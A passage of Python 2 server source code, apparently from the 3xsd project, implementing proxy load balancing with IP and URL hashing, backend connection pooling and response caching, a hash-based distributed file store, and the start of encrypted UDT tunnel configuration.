_ip_forward = self.in_headers.get('X-Forwarded-For')
if _ip_forward:
#get the real peer ip, for what via cache servers
_ip_peer = _ip_forward.split(',', 1)[0].strip()
except:
_ip_peer = b''
_ips = self.rra.get(z_hostname)
_ips_n = len(_ips)
if _ip_peer:
#ip hash, with c block num
_ip = _ip_peer.split('.')
_idx = __idx = (int(_ip[0])*65536 + int(_ip[1])*256 + int(_ip[2]))%_ips_n
_try = 1
while self.stat[_ips[_idx]][0] == False:
#server marked down
_t = time.time()
if _t - self.stat[_ips[_idx]][2] > self.stat[_ips[_idx]][1]:
#expires ttl, will be rechecked
self.stat[_ips[_idx]][0] = True
self.stat[_ips[_idx]][2] = _t
break
_idx = random.randint(0, _ips_n - 1)
if _idx == __idx:
_idx = (_idx + 1) % _ips_n
_try += 1
if _try >= _ips_n:
break
return _ips[_idx]
else:
return _ips[random.randint(0, _ips_n - 1)]
elif self.z_mode == self.Z_URL:
#url hash, with path md5's first 6 hex digist
md5 = hashlib.md5()
md5.update(self.path)
_path_md5 = md5.hexdigest()
_ips = self.rra.get(z_hostname)
_ips_n = len(_ips)
_idx = __idx = (int(_path_md5[0:1], base=16)*65536 + int(_path_md5[2:3], base=16)*256 + int(_path_md5[4:5], base=16))%_ips_n
_try = 1
while self.stat[_ips[_idx]][0] == False:
#server marked down
_t = time.time()
if _t - self.stat[_ips[_idx]][2] > self.stat[_ips[_idx]][1]:
#expires ttl, will be rechecked
self.stat[_ips[_idx]][0] = True
self.stat[_ips[_idx]][2] = _t
break
_idx = random.randint(0, _ips_n - 1)
if _idx == __idx:
_idx = (_idx + 1) % _ips_n
_try += 1
if _try >= _ips_n:
break
return _ips[_idx]
def z_GET_backend(self):
#resume send (large)request to backend
self._r = self.server.z_reqs[self._f]
return self.z_send_request_resume(self._r, self._f)
def z_connect_backend(self, rw=0, client_sock=None, addr=None, update_cb_conns=True):
#print "connecting to backend" #bbb
if addr:
self.z_host_addr = addr
else:
self.z_host_addr = self.z_parse_address(self.z_pick_a_backend())
self.z_host_sock = None
while str(self.z_host_addr) in self.server.zidles and len(self.server.zidles[str(self.z_host_addr)]) > 0:
#look for idle connection
self.z_host_sock = self.server.zconns.get(self.server.zidles[str(self.z_host_addr)].pop(), None)
_zsfn = self.z_host_sock.fileno()
if _zsfn == -1 or time.time() - self.server.zconns_stat[_zsfn][1] > self.z_idle_ttl:
self.z_host_sock = None
else:
break
if not self.z_host_sock:
#the idle conn may be closed, make a new connection
#self.z_host_sock = gevent.socket.create_connection(self.z_host_addr)
self.z_host_sock = socket.socket()
self.z_host_sock.settimeout(5)
try:
self.z_host_sock.connect(self.z_host_addr)
except socket.error as e: #ppp
_addr_s = ''.join([self.z_host_addr[0],':',str(self.z_host_addr[1])])
self.stat[_addr_s][0] = False
self.stat[_addr_s][2] = time.time()
if e.errno == errno.ECONNRESET:
self.set_resp_code(502)
elif e.errno == errno.ETIMEDOUT:
self.set_resp_code(504)
elif e.errno == errno.ECONNREFUSED:
self.set_resp_code(503)
else:
self.set_resp_code(500)
self.xResult = self.xR_ERR_5xx
return
self.z_host_sock.setblocking(0)
self.z_host_sock.setsockopt(socket.SOL_SOCKET,socket.SO_KEEPALIVE,1)
self.z_host_sock.setsockopt(socket.SOL_TCP, socket.TCP_KEEPIDLE, 20)
self.z_host_sock.setsockopt(socket.SOL_TCP, socket.TCP_KEEPCNT, 4)
self.z_host_sock.setsockopt(socket.SOL_TCP, socket.TCP_KEEPINTVL, 5)
#make client-backend socket pair, store them into cb_conns
#identify backend socket self.z_host_sock with client socket self._f
if update_cb_conns:
if rw == 0:
_c_sock_fileno = self._f
elif rw == 2:
_c_sock_fileno = client_sock.fileno()
self.server.cb_conns[_c_sock_fileno] = [self.z_host_sock, self.z_host_sock.fileno()]
self._f = self.z_host_sock.fileno()
#now self._f is backend socket, identidy it with client socket
if update_cb_conns:
self.server.zconns_stat[self._f] = [1, -1] #using backend connection
if rw == 0:
self.server.cb_conns[self._f] = [self.sock, self.sock.fileno()]
elif rw == 2:
self.server.cb_conns[self._f] = [client_sock, client_sock.fileno()]
#print "z_connect_backend create cb_conns pair:", _c_sock_fileno, self._f
#print "cb_conns:", self.server.cb_conns
#print "get zconn:", self._f
#print "self.sock:", self.sock
self.server.zconns[self._f] = self.z_host_sock
self.server.zaddrs[self._f] = self.z_host_addr
self.server.zhosts[self._f] = self.z_hostname
def z_send_request_init(self, no_recv=False):
#init send request, _r for request headers, _f for socket fileno to backend
self.server.z_reqs[self._f] = self._r
#self.server.z_resp_header[self._f] = None
self.server.z_path[self._f] = self.path
#if no_recv:
# self.z_host_sock.shutdown(socket.SHUT_RD)
try:
if len(self._r) > self.send_buf_size/2:
_buf_size = self.send_buf_size/2
_once = False
else:
_buf_size = len(self._r)
_once = True
sent = self.z_host_sock.send(self._r[:_buf_size])
if sent < _buf_size:
_once = False
if not _once:
self.server.z_reqs_stat[self._f] = [sent, no_recv]
try:
self.server.epoll.register(self._f, select.EPOLLIN | select.EPOLLOUT)
except IOError as e:
self.server.epoll.modify(self._f, select.EPOLLIN | select.EPOLLOUT)
except:
raise
else:
if self._f in self.server.z_reqs_stat:
self.server.z_reqs_stat.pop(self._f)
try:
self.server.epoll.register(self._f, select.EPOLLIN)
except IOError as e:
self.server.epoll.modify(self._f, select.EPOLLIN)
except:
raise
except socket.error as e:
return self.PARSE_ERROR
except:
raise
if no_recv:
if _once:
try:
self.server.epoll.unregister(self._f)
except:
raise
self.z_host_sock.close()
self.server.zconns.pop(self._f)
self.server.zaddrs.pop(self._f)
self.server.zhosts.pop(self._f)
else:
if self._f in self.server.z_reqs_cnt:
self.server.z_reqs_cnt[self._f] += 1
else:
self.server.z_reqs_cnt[self._f] = 1
def z_send_request_resume(self, _r, _f):
#resume request sending
if _f in self.server.z_reqs_stat:
begin, no_recv = self.server.z_reqs_stat[_f]
if len(_r[begin:]) > self.send_buf_size/2:
_buf_size = self.send_buf_size/2
else:
_buf_size = len(_r[begin:])
sent = self.z_host_sock.send(_r[begin:begin+_buf_size])
if begin + sent < len(_r):
self.server.z_reqs_stat[_f] = [begin + sent, no_recv]
else:
#all sent
self.server.z_reqs_stat.pop(_f)
if not no_recv:
self.server.epoll.modify(_f, select.EPOLLIN)
else:
try:
self.server.epoll.unregister(self._f)
except:
pass
self.z_host_sock.close()
self.server.zconns.pop(self._f)
self.server.zaddrs.pop(self._f)
self.server.zhosts.pop(self._f)
return False
def z_GET_init(self):
#init connection to backend, send request, ggg
_f = None
try:
self.z_hostname, _port = self.z_parse_address(self.in_headers.get("Host").lower())
if self.z_hostname not in self.rra.keys() and not self.transparent_proxy:
#not my serving hostname
self.xResult = self.xR_ERR_HANDLE
return
_cb = self.server.cb_conns.get(self._f)
if _cb:
self.z_host_sock, _f = _cb
else:
self.z_host_sock, _f = self.None2
if _f and self.server.zhosts.get(_f, None) == self.z_hostname:
#print "z_GET_init remake cb_conns pair:", self._f, _f
self._f = _f
self.server.cb_conns[_f] = [self.sock, self.sock.fileno()]
else:
#print "z_GET_init new conn:", self._f, _f
self.z_connect_backend()
_f = self._f
if self.xResult == self.xR_ERR_5xx:
return
self.z_send_request_init()
except:
self.xResult = self.xR_ERR_HANDLE
def z_transfer_client(self, __f):
#to client 222
_cb = self.server.cb_conns.get(__f)
if _cb:
_c, _f = _cb
else:
_c, _f = self.None2
if _f not in self.server.zcache_stat:
return False
blockno, begin = self.server.zcache_stat[_f][:2]
if blockno == len(self.server.zcache[_f]):
if self.server.zcache_stat[_f][4] == 1:
#finished all sent
self.server.epoll.modify(self.sock, select.EPOLLIN)
if self.server.zcache_stat[_f][7] == self.HTTP_OK:
if self.server.zcache_stat[_f][10] == 1 or self.server.zcache_stat[_f][5] > 0:
#only 200 and chuncked or body_size > 0 response item moved to xcache
#here may be wrong, should use self.cmd_get instead of self.server.zcache_stat[_f][5]
self.zcache_to_xcache(_f)
self.server.z_reqs_cnt[_f] -= 1
if self.server.z_reqs_cnt[_f] == 0:
#release z_conn & c_conn pair in cb_conns
#print "z_transfer_client clean cb_conns pair:", __f, _f
self.server.cb_conns[__f] = None
self.server.cb_conns[_f] = None
_backend_sock = self.server.zconns.get(_f)
if _backend_sock:
if _backend_sock.fileno() == -1:
#backend closed connection
self.server.zconns.pop(_f)
self.server.zconns_stat.pop(_f)
else:
#add idle list
if str(self.server.zaddrs[_f]) in self.server.zidles:
if _f not in self.server.zidles[str(self.server.zaddrs[_f])]:
#add to idle list
self.server.zidles[str(self.server.zaddrs[_f])].appendleft(_f)
else:
self.server.zidles[str(self.server.zaddrs[_f])] = deque([_f])
self.server.zconns_stat[_f] = [0, time.time()] #conn idle
#clean zcache
self.server.zcache.pop(_f)
self.server.zcache_stat.pop(_f)
#self.server.z_path.pop(_f)
#finished
return True
else:
#no more data yet or finished with no Content-Length? that's a problem.
_backend_sock = self.server.zconns.get(_f)
if _backend_sock:
if _backend_sock.fileno() == -1:
self.server.zcache_stat[_f][5] = self.server.zcache_stat[_f][2] - self.server.zcache_stat[_f][3]
self.server.zcache_stat[_f][4] = 1
return False
if len(self.server.zcache[_f][blockno][begin:]) > self.send_buf_size:
sent = self.sock.send(self.server.zcache[_f][blockno][begin:begin + self.send_buf_size])
should_sent = self.send_buf_size
self.server.zcache_stat[_f][1] += sent
else:
sent = self.sock.send(self.server.zcache[_f][blockno][begin:])
should_sent = len(self.server.zcache[_f][blockno][begin:])
if sent < should_sent:
self.server.zcache_stat[_f][1] += sent
else:
self.server.zcache_stat[_f][0] += 1
self.server.zcache_stat[_f][1] = 0
#print "sent block:", blockno, sent, len(self.server.zcache[_f][blockno]), self.send_buf_size
#print "zcache_stat:", self.server.zcache_stat[_f]
return False
def zcache_to_xcache(self, _f):
#remember that only 200 and body_size > 0 response item will be moved to xcache
_cc = self.server.z_resp_header[_f].get('Cache-Control')
_exp = self.server.z_resp_header[_f].get('Expires')
_ttl = 0
_t = time.time() #now
if _cc:
if "private" in _cc or "no-cache" in _cc:
_ttl = -1
elif "max-age=" in _cc:
_age_s = ''
_index = _cc.find('max-age=') + len('max-age=')
while _cc[_index] in ['1','2','3','4','5','6','7','8','9','0']:
_age_s = ''.join([_age_s, _cc[_index]])
_index += 1
if _index > len(_cc) - 1:
break
_ttl = _t + int(_age_s)
else:
if _exp:
#Expires: Tue, 20 Oct 2015 04:27:25 GMT
_ttl = calendar.timegm(time.strptime(_exp, '%a, %d %b %Y %H:%M:%S GMT'))
else:
_ttl = self.xcache_ttl + _t
else:
if _exp:
_ttl = calendar.timegm(time.strptime(_exp, '%a, %d %b %Y %H:%M:%S GMT'))
else:
_ttl = self.xcache_ttl + _t
if _ttl > _t:
if len(self.server.xcache) > self.z_cache_size:
self.server.xcache.popitem()
try:
self.server.z_resp_header[_f].pop("Connection")
except:
pass
self.out_head_s = ''.join(['\n'.join(['%s: %s' % (k, v) for k, v in self.server.z_resp_header[_f].items()]), '\n'])
_resp = ''.join(self.server.zcache[_f])
self.out_body_file = _resp[self.server.zcache_stat[_f][3]:]
self.out_body_size = len(self.out_body_file)
_xcache_key = b''
_content_encoding = self.server.z_resp_header[_f].get('Content-Encoding')
if _content_encoding:
_xcache_key = ''.join([_content_encoding, ':', self.server.zcache_stat[_f][9],self.server.zcache_stat[_f][8]])
else:
_xcache_key = ''.join([self.server.zcache_stat[_f][9],self.server.zcache_stat[_f][8]])
self.server.xcache[_xcache_key] = [_ttl, self.out_head_s, self.out_body_file, self.out_body_size, self.out_body_file_lmt, self.out_body_mmap]
if self.z_xcache_shelf:
try:
if len(self.server.xcache_shelf) > self.z_shelf_size:
if hasattr(self.server.xcache_shelf.dict, 'first'):
#dbhash format
k, v = self.server.xcache_shelf.dict.first()
with self.server.xcache_shelf_lock:
del self.server.xcache_shelf[k]
if hasattr(self.server.xcache_shelf.dict, 'firstkey'):
#gdbm format
with self.server.xcache_shelf_lock:
del self.server.xcache_shelf[self.server.xcache_shelf.dict.firstkey()]
except:
pass
try:
#moved to self.server.check_lbs
#while len(self.server.xcache_shelf.cache) > self.z_cache_size:
# self.server.xcache_shelf.cache.popitem()
with self.server.xcache_shelf_lock:
self.server.xcache_shelf[_xcache_key] = self.server.xcache[_xcache_key]
#moved to self.server.check_lbs
#if hasattr(self.server.xcache_shelf.dict, 'sync'):
# #self.server.xcache.dict is an anydbm object, mostly gdbm
# self.server.xcache_shelf.dict.sync()
except:
#may be problem in concurrent mode
pass
def z_transfer_backend(self, _f):
#from backend
try:
_b = self.z_host_sock.recv(self.recv_buf_size)
if not _b:
#peer closed connection?
#print "no content recieved, trying reconnect"
return self.PARSE_AGAIN
except socket.error as e:
if e.errno == errno.EAGAIN:
#no more request data, see if the whole request headers should be recieved
return self.PARSE_AGAIN
else:
#peer closed connection?
#return self.PARSE_AGAIN
return self.PARSE_ERROR
#self.server.zcache_stat[_f] sample:
#[2, 0, 25230, 217, 0, 25013, 1, 200, '/py/vms_rrd/vms-ping_day.png', 'vm0']
if _f in self.server.zcache and self.server.zcache_stat[_f][4] == 0 and self.z_finished == 0:
#continue recv
"""
self.server.zcache_stat[_f][2] total_size_recv
self.server.zcache_stat[_f][3] header_length
self.server.zcache_stat[_f][4] finished
self.server.zcache_stat[_f][5] body_size
self.server.zcache_stat[_f][6] keep_connection
self.server.zcache_stat[_f][7] http_status_code
self.server.zcache_stat[_f][8] path
self.server.zcache_stat[_f][9] hostname
self.server.zcache_stat[_f][10] chuncked encoding
"""
self.server.zcache[_f].append(_b)
self.server.zcache_stat[_f][2] += len(_b)
if not self.response_headers_parsed:
if self.EOL2 in _b or self.EOL1 in _b:
#rebuild the response headers and check them
self.parse_backend_response_headers(''.join(self.server.zcache[_f]), _f)
self.server.zcache_stat[_f][3] = self.z_header_length
self.server.zcache_stat[_f][6] = self.keep_connection
self.server.zcache_stat[_f][7] = self.resp_code
if self.response_headers_parsed:
_cb = self.server.cb_conns.get(_f)
if _cb:
_c_sock, _c_sock_no = _cb
else:
_c_sock, _c_sock_no = self.None2
if _c_sock:
if _c_sock_no in self.server.xcache_stat:
#clear xcache_stat to avoid cache hit before
self.server.xcache_stat.pop(_c_sock_no, None)
self.server.epoll.modify(_c_sock, select.EPOLLIN | select.EPOLLOUT)
if self.server.zcache_stat[_f][5] > 0:
if self.server.zcache_stat[_f][2] == self.server.zcache_stat[_f][5] + self.server.zcache_stat[_f][3]:
#finished content-length
self.server.zcache_stat[_f][4] = 1
self.z_finished = 1
elif self.server.zcache_stat[_f][5] == 0 and "0\r\n\r\n" in _b:
#finished chunked encoding
self.server.zcache_stat[_f][4] = 1
self.z_finished = 1
elif self.z_finished == 0:
#first recv
_path = self.server.z_path[_f]
_z_hostname = self.server.zhosts[_f]
self.server.zcache[_f] = [_b]
#zcache_stat format: [block num, size sent, total_size_recv, header_length, finished, body_size, keep_connection,resp_code,path,hostname,chuncked_encoding]
if self.EOL2 in _b or self.EOL1 in _b:
self.parse_backend_response_headers(_b, _f)
self.server.zcache_stat[_f] = [0, 0, len(_b), self.z_header_length, self.z_finished, self.z_body_size, self.keep_connection, self.resp_code, _path, _z_hostname, self.chuncked_encoding]
else:
self.server.zcache_stat[_f] = [0, 0, len(_b), -1, 0, -1, -1, 0, _path, _z_hostname, self.chuncked_encoding]
if self.response_headers_parsed:
_cb = self.server.cb_conns.get(_f)
if _cb:
_c_sock, _c_sock_no = _cb
else:
_c_sock, _c_sock_no = self.None2
if _c_sock:
if _c_sock_no in self.server.xcache_stat:
#clear xcache_stat to avoid cache hit before
self.server.xcache_stat.pop(_c_sock_no, None)
self.server.epoll.modify(_c_sock, select.EPOLLIN | select.EPOLLOUT)
#else:
#at this point, the last request of client should completed and cb_conns cleaned
#may be safe to ignore it, but if this request is different from the last? ....
#print "cb_conns:", self.server.cb_conns
#print "f:", _f, "zcache_stat:", self.server.zcache_stat, "z_reqs_cnt:", self.server.z_reqs_cnt
if self.z_finished == 1:
self.server.epoll.unregister(_f)
return self.PARSE_OK
else:
return self.PARSE_MORE
def parse_backend_response_headers(self, _b, _f):
#cut headers out
b = _b.split(self.EOL2, 1)
sp = len(self.EOL2)
if not b[0]:
b = _b.split(self.EOL1, 1)
sp = len(self.EOL1)
if not b[0]:
#illeagal response headers
return self.PARSE_ERROR
self.z_header_length = len(b[0]) + sp
a = b[0].strip().split("\r\n", 1)
if not a[0]:
return self.PARSE_ERROR
#"HTTP/1.1 200 OK"
_c_http_ver, _resp_code_str, self.resp_msg = a[0].split(None, 2)
self.resp_code = int(_resp_code_str)
if self.resp_code == self.HTTP_OK:
self.has_resp_body = True
self.server.z_resp_header[_f] = dict((k, v) for k, v in (item.split(": ") for item in a[1].split("\r\n")))
self.in_headers = dict((k, v) for k, v in (item.split(": ") for item in a[1].split("\r\n")))
try:
self.z_finished = 0
cl = self.in_headers.get("Content-Length")
if cl:
self.z_body_size = int(cl)
if len(b[1]) == self.z_body_size:
self.z_finished = 1
else:
c1 = self.in_headers.get("Transfer-Encoding")
if c1:
if c1.lower()== "chunked":
self.chuncked_encoding = 1
self.z_body_size = 0
if "0\r\n\r\n" in b[1]:
self.z_finished = 1
else:
self.z_body_size = -1
else:
if self.z_host_sock.fileno() == -1:
#backend closed connection, transfer finished
self.z_body_size = len(_b) - self.z_header_length
self.z_finished = 1
elif self.resp_code > self.HTTP_OK:
self.z_body_size = 0
self.z_finished = 1
else:
self.z_body_size = 0
except:
self.z_body_size = -1
self.z_finished = 0
self.check_connection(_c_http_ver, check_ims=False, gen_xcache_key=False)
self.response_headers_parsed = True
self.server.k_conns[_f] = [self.r_http_ver, self.keep_connection]
#mangle the http status line and "Connection:" header to fit client side
#_b = self.server.zcache[_f][0] #headers in block 0
#print "_f:", _f, "cb_conns:", self.server.cb_conns, "k_conns", self.server.k_conns
try:
__rc_http_ver, _c_keep_connection = self.server.k_conns[self.server.cb_conns[_f][1]]
if __rc_http_ver == 1:
_rc_http_ver = "HTTP/1.1"
else:
_rc_http_ver = "HTTP/1.0"
except:
_rc_http_ver = "HTTP/1.0"
_c_keep_connection = 0
if _c_http_ver != _rc_http_ver:
if "HTTP/1.1" in self.server.zcache[_f][0]:
self.server.zcache[_f][0] = self.server.zcache[_f][0].replace("HTTP/1.1", "HTTP/1.0", 1)
elif "HTTP/1.0" in self.server.zcache[_f][0]:
self.server.zcache[_f][0] = self.server.zcache[_f][0].replace("HTTP/1.0", "HTTP/1.1", 1)
if _c_keep_connection != self.keep_connection:
if "Connection: keep-alive" in self.server.zcache[_f][0]:
self.server.zcache[_f][0] = self.server.zcache[_f][0].replace("Connection: keep-alive", "Connection: close", 1)
self.z_header_length -= 5
elif "Connection: close" in self.server.zcache[_f][0]:
self.server.zcache[_f][0] = self.server.zcache[_f][0].replace("Connection: close", "Connection: keep-alive", 1)
self.z_header_length += 5
def out_conns_stats(self):
print "--------------------------------------------------------------------------"
print "zconns:", self.server.zconns
print "zconns_stat:", self.server.zconns_stat
print "zidles:", self.server.zidles
print "cb_conns:", self.server.cb_conns
print "--------------------------------------------------------------------------"
def check_zconns(self):
while 1:
gevent.sleep(10)
for f in self.server.zconns.keys():
if f in self.server.zconns_stat:
_t = self.server.zconns_stat[f][1]
if time.time() - _t > self.z_idle_ttl:
#idle time out, clean it
if self.server.zidles:
for _host in self.server.zidles.keys():
if self.server.zidles[_host]:
try:
self.server.zidles[_host].remove(f)
except:
pass
_sock = self.server.zconns[f]
self.server.cleanz(f)
_sock.close()
class _xDFSHandler(_xZHandler):
DFS_PROXY_MODE = 0
DFS_DIRECT_MODE = 1
d_mode = 0
dfs_config = None
dfs_stage = 0
dfs_redundancy = 1
dfs_region = 4096
dfs_prefix = '_3fs'
dfs_prefix_s = '/_3fs_'
dfs_pool = {}
dfs_pool_count = {}
dfs_writer = []
file_stage = 0
file_path = b''
file_md5 = b''
peer_ip_s = b''
def __init__(self, conn, client_address, server, native_epoll=True,
gevent_stream=False, recv_buf_size=16384, send_buf_size=65536, d_mode=0):
_xZHandler.__init__(self, conn, client_address, server, native_epoll, gevent_stream,
recv_buf_size, send_buf_size, -1)
self.init_dfs_config()
self.d_mode = d_mode
def init_dfs_config(self):
try:
#for reload config
self.dfs_pool = {}
self.dfs_pool_count = {}
self.dfs_writer = []
self.ttl = {}
self.rra = {}
self.rrn = {}
self.dfs_config = ConfigParser.ConfigParser()
if not self.dfs_config.read('3xsd.conf'):
self.dfs_config.read('/etc/3xsd.conf')
for name, value in self.dfs_config.items('3fsd'):
if name == 'stage':
self.dfs_stage = int(value)
elif name == 'redundancy':
self.dfs_redundancy = int(value)
elif name == 'region':
self.dfs_region = int(value)
self.dfs_region_mask = 1
while self.dfs_region/(16**self.dfs_region_mask) > 1:
self.dfs_region_mask += 1
elif name == 'prefix':
self.dfs_prefix = value
self.dfs_prefix_s = ''.join(['/', self.dfs_prefix, '_'])
elif name == 'write_permit':
self.ttl['3fs_writer'] = 0
self.dfs_writer = self.ip_list('3fs_writer', value, '3nsd')
else:
#must be a pool config of a domain_name
#3xsd.net = 0,10.37.10.1-2:80,10.38.10.2:80;1,10.41.0.1-2:8000
self.ttl[name] = self.rrn[name] = 0
self.rra[name] = []
self.dfs_pool[name] = {}
self.dfs_pool_count[name] = {}
for item in value.split(';'):
if item:
_stage_s, _ip_s = item.split(',', 1)
if _stage_s and _ip_s:
#dfs_pool['3xsd.net'][0] = ['10.37.10.1:80', '10.37.10.2:80', '10.38.10.2:80']
#dfs_pool['3xsd.net'][1] = ['10.41.0.1:8000', '10.41.0.2:8000']
if self.dfs_pool[name].get(int(_stage_s)):
self.dfs_pool[name][int(_stage_s)] += self.ip_list(name, _ip_s, '3fsd')
else:
self.dfs_pool[name][int(_stage_s)] = self.ip_list(name, _ip_s, '3fsd')
for i in self.dfs_pool[name]:
#to gen a fixed sorted server list, important for locating algorithm
self.dfs_pool[name][i].sort()
self.dfs_pool_count[name][i] = len(self.dfs_pool[name][i])
#rra pool for RoundRobin
self.rra[name] += self.dfs_pool[name][i]
if self.rra.get(name):
#make list distinct and sorted
self.rra[name] = list(set(self.rra[name]))
self.rra[name].sort()
#print self.rra[name]
except:
raise
#print "stage:", self.dfs_stage, ", redundancy:", self.dfs_redundancy, ", region:", self.dfs_region, ", prefix:", self.dfs_prefix, ", pool:", self.dfs_pool
def init_handler(self, conn, client_address, rw_mode=0):
_xZHandler.init_handler(self, conn, client_address, rw_mode)
#do 3fsd specific initiation
self.file_stage = 0
self.file_path = self.file_md5 = b''
def z_pick_a_backend(self, return_all=False):
#self.z_hostname self.path self._r should be setup
if self.dfs_prefix_s == self.path[:len(self.dfs_prefix_s)]:
#it's a dfs access
return self.dfs_locate_backend(self.z_hostname, return_all)
else:
return _xZHandler.z_pick_a_backend(self)
def dfs_locate_backend(self, hostname, return_all=False):
#3fs locating algorithm
#url example: http://hostname/_3fs_0/path/to/file, 0 for stage
#/path/to/file will be used to calculate out a standard md5 hex_string of 32 letters with lower case
#/path/to/file -> b4a91649090a2784056565363583d067
_fstage_s, _fpath = self.path[len(self.dfs_prefix_s):].split('/', 1)
self.file_stage = int(_fstage_s)
self.file_path = ''.join(['/', _fpath])
md5 = hashlib.md5()
md5.update(self.file_path)
self.file_md5 = md5.hexdigest()
i = 0
_ret = []
while self.dfs_redundancy - i > 0:
_point = int(self.file_md5[self.dfs_region_mask*i:self.dfs_region_mask*(i+1)], base=16)
_serno = __serno = int(_point / float(self.dfs_region / self.dfs_pool_count[hostname][self.dfs_stage]))
while self.dfs_pool[hostname][self.dfs_stage][_serno] in _ret:
#make sure the redundancy copys not in same server
_serno = ( _serno + 1 ) % self.dfs_pool_count[hostname][self.dfs_stage]
if _serno == __serno:
break
_ret.append(self.dfs_pool[hostname][self.dfs_stage][_serno])
i += 1
if return_all:
return _ret
else:
return _ret[random.randint(0, self.dfs_redundancy - 1)]
def z_GET_init(self):
#init connection to backend, send request, ggg
_f = None
try:
self.z_hostname, _port = self.z_parse_address(self.in_headers.get("Host").lower())
if self.z_hostname not in self.rra.keys():
#not my serving hostname
self.xResult = self.xR_ERR_HANDLE
return
_cb = self.server.cb_conns.get(self._f)
if _cb:
self.z_host_sock, _f = _cb
else:
self.z_host_sock, _f = self.None2
if _f and self.server.zhosts.get(_f, None) == self.z_hostname and self.dfs_prefix_s != self.path[:len(self.dfs_prefix_s)]:
#print "z_GET_init remake cb_conns pair:", self._f, _f
self._f = _f
self.server.cb_conns[_f] = [self.sock, self.sock.fileno()]
else:
#print "z_GET_init new conn:", self._f, _f
self.z_connect_backend()
_f = self._f
if self.xResult == self.xR_ERR_5xx:
return
self.z_send_request_init()
except:
self.xResult = self.xR_ERR_HANDLE
def z_PUT_init(self):
try:
self.z_hostname, _port = self.z_parse_address(self.in_headers.get("Host").lower())
if self.z_hostname not in self.rra.keys():
#not my serving hostname
self.xResult = self.xR_ERR_HANDLE
return
if self.dfs_prefix_s == self.path[:len(self.dfs_prefix_s)]:
#only 3fs access allow PUT/DELETE action in z_lbs & x_dfs mode
try:
self.peer_ip_s, _port_s = self.sock.getpeername()
except:
self.peer_ip_s = b''
if self.peer_ip_s not in self.dfs_writer:
self.xResult = self.xR_ERR_HANDLE
return
_backends = self.z_pick_a_backend(return_all=True)
_b_index = 0
for _b in _backends:
self.z_host_addr = self.z_parse_address(_b)
self.z_host_sock = None
if _b_index == 0:
self.z_connect_backend(addr=self.z_host_addr)
self.z_send_request_init()
else:
self.z_connect_backend(addr=self.z_host_addr, update_cb_conns=False)
self.z_send_request_init(no_recv=True)
_b_index += 1
else:
self.xResult = self.xR_ERR_HANDLE
except:
self.xResult = self.xR_ERR_HANDLE
raise
class _xWHandler:
server = None
wdd_mode = 'server'
wdd_dial = []
encrypt = False
encrypt_mode = None
sess_encrypt_mode = {}
aes = {}
compress_tunnel = {}
session = {}
client_session = {}
connected = {}
tun_local_ip = {}
tun_peer_ip = {}
tun_mtu = {}
tun_txqueue = {}
token = {}
e_token = {}
peer_ip = {}
peer_port = {}
tun_route = {}
tun_rtt = {}
route_metric = {}
route_metric_fixed = {}
routing_metric = False
ifup_script = {}
ifdown_script = {}
rtch_script = {}
udt_relay = {}
udt_relay_thread_stat = {}
IO_BLOCK = 0
IO_NONBLOCK = 1
io_mode = 0
def __init__(self, conn, client_address, server, recv_buf_size=2760000, send_buf_size=2760000):
self.server = server
self.recv_buf_size = recv_buf_size
self.send_buf_size = send_buf_size
self.init_wdd_config()
self.init_handler()
def init_wdd_config(self):
#for reload config
self.wdd_mode = 'server'
self.wdd_dial = []
self.encrypt = False
self.encrypt_mode = None
self.sess_encrypt_mode = {}
self.aes = {}
self.session = {}
self.client_session = {}
self.connected = {}
self.tun_local_ip = {}
self.tun_peer_ip = {}
self.tun_mtu = {}
self.tun_txqueue = {}
self.token = {}
self.e_token = {}
self.peer_ip = {}
self.peer_port = {}
self.tun_route = {}
self.tun_rtt = {}
self.route_metric = {}
self.route_metric_fixed = {}
self.udt_relay = {}
self.udt_relay_thread_stat = {}
self.compress_tunnel = {}
self.io_mode = 0
self.routing_metric = False
self.ifup_script = {}
self.ifdown_script = {}
self.rtch_script = {}
self.config = ConfigParser.ConfigParser()
if not self.config.read('3xsd.conf'):
self.config.read('/etc/3xsd.conf')
#
#example: an udt tunnel session called: peer1
#local ip: 10.19.27.1 peer ip: 10.19.27.2
#mtu: 1500 txqueue: 1000 connect token(password): ddw3~)
#
#peer1 = 10.19.27.1:10.19.27.2:1500:1000:ddw3~)
for name, value in self.config.items('3wdd'):
if name == 'mode':
self.wdd_mode = value.lower()
elif name == 'dial':
self.wdd_dial = value.split(',')
elif name == 'encrypt':
self.encrypt = True
_value = value.lower()
if _value == 'on' or _value == 'aes-128-ecb':
self.encrypt_mode = AES.MODE_ECB
elif _value == 'aes-128-cbc':
self.encrypt_mode = AES.MODE_CBC
elif _value == 'aes-128-cfb':
self.encrypt_mode = AES.MODE_CFB
elif _value == 'aes-128-ctr':
self.encrypt_mode = AES.MODE_CTR
elif _value == 'blowfish-cbc':
self.encrypt_mode = Blowfish.MODE_CBC + 100 #diff from aes
elif _value == 'blowfish-cfb':
self.encrypt_mode = Blowfish.MODE_CFB + 100
elif _value == 'blowfish-ctr':
self.encrypt_mode = Blowfish.MODE_CTR + 100
else:
self.encrypt = False
elif name == 'io_mode':
_value = value.lower()
if _value == 'block' or _value == 'default':
self.io_mode = self.IO_BLOCK
elif _value == 'non_block':
self.io_mode = self.IO_NONBLOCK
else:
self.io_mode = self.IO_BLOCK
elif name == 'relay':
for _from_to in value.split(','):
_from, _to = _from_to.split(':')
if _from and _to:
self.udt_relay[_from] = (_from, _to)
self.udt_relay[_to] = (_from, _to)
self.udt_relay_thread_stat[_from] = False
self.udt_relay_thread_stat[_to] = False
elif name == 'routing_metric':
_value = value.lower()
if _value == 'on':
self.routing_metric = True
else:
v = value.split(':')
if len(v) >= 5:
self.session[name] = True
self.tun_local_ip[name] = v[0]
self.tun_peer_ip[name] = v[1]
self.tun_mtu[name] = int(v[2]) if v[2] else 0
self.tun_txqueue[name] = int(v[3]) if v[3] else 0
self.token[name] = v[4]
self.e_token[name] = self.encrypt_token(name, v[4])
if self.encrypt:
if self.encrypt_mode == AES.MODE_CBC or self.encrypt_mode == AES.MODE_CFB:
#aes-128-cbc, aes-128-cfb
pass
else:
#aes-128-ecb as default
if name not in self.aes:
self.aes[name] = AES.new(self.e_token[name], AES.MODE_ECB)
if len(v) > 5:
if v[5]:
_em_zip = v[5].lower().split(',')
_em = _em_zip[0]
if _em == 'aes-128-cbc':
self.sess_encrypt_mode[name] = AES.MODE_CBC
elif _em == 'aes-128-cfb':
self.sess_encrypt_mode[name] = AES.MODE_CFB
elif _em == 'aes-128-ctr':
self.sess_encrypt_mode[name] = AES.MODE_CTR
elif _em == 'on' or _em == 'aes-128-ecb':
